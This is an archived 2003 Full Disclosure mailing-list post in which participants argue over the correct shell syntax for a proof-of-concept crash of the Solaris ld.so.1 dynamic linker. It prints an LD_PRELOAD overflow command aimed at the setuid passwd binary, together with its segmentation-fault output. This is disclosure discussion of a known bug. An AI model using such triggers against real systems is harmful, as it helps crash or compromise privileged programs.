Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Full Disclosure: RE: Re: Fwd: Re: Solaris ld.so.1 buffer overflow

RE: Re: Fwd: Re: Solaris ld.so.1 buffer overflow

From: uidzer0 <uidzer0_at_sptrm.com>
Date: 31 Jul 2003 18:05:16 -0400

Paul, you are mistaken. Why are you trying to escape the backtick with a
'/' (forwardslash) ... Escapes are '\' (backslash) .. But nice try. But
since you must not have any nix boxes around, let me be the nice guy and
show you the output of your misguided command structure. And let's not
even go into why you would want to escape the perl command anyhow,
seeing how that totally defeats the purpose of this entire thread.

so, here we go.

Paul wants to escape perl.. sounds good, lets see what happens.

LD_PRELOAD=\`perl -e 'print "A"x2000'\` passwd
LD_PRELOAD=`perl: Command not found.

So, now, Paul wants to use his so-called escape character (/) to escape
just the trailing backtick.. so here we go:

LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd
syntax error at -e line 1, at EOF
Execution of -e aborted due to compilation errors.
LD_PRELOAD=/: Command not found.

So, the correct way of doing this is exactly the way David posted
originally.

$ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
ld.so.1: passwd: warning:
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

... (bunch of A's)

AAAAAAAAAAAAAAAAAAAAAAAAAAA/: open failed: illegal insecure pathname
Segmentation Fault

oh, and this was done on a solaris 8 box.

peace

-0

On Thu, 2003-07-31 at 11:08, Schmehl, Paul L wrote:
> > -----Original Message-----
> > From: Jim Dew [mailto:jdew_at_yggdrasil.ca]
> > Sent: Wednesday, July 30, 2003 8:19 PM
> > To: Jouko Pynnonen
> > Cc: full-disclosure_at_lists.netsys.com
> > Subject: [Full-disclosure] Re: Fwd: Re: Solaris ld.so.1
> > buffer overflow
> >
> >
> > On Wed, Jul 30, 2003 at 07:49:28PM +0300, Jouko Pynnonen wrote:
> > >
> > > On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote:
> > > > Modify the command (you need to add a trailing slash) to be the
> > > > following:
> > > >
> > > > LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd
> > > >
> > > > and try it again.
> > >
> >
> > this segfaults on solaris 2.6
> >
> Try moving the escape to *before* the backtick:
> LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd
>
> Paul Schmehl (pauls_at_utdallas.edu)
> Adjunct Information Security Officer
> The University of Texas at Dallas
> AVIEN Founding Member
> http://www.utdallas.edu/~pauls/
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Received on Aug 01 2003

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos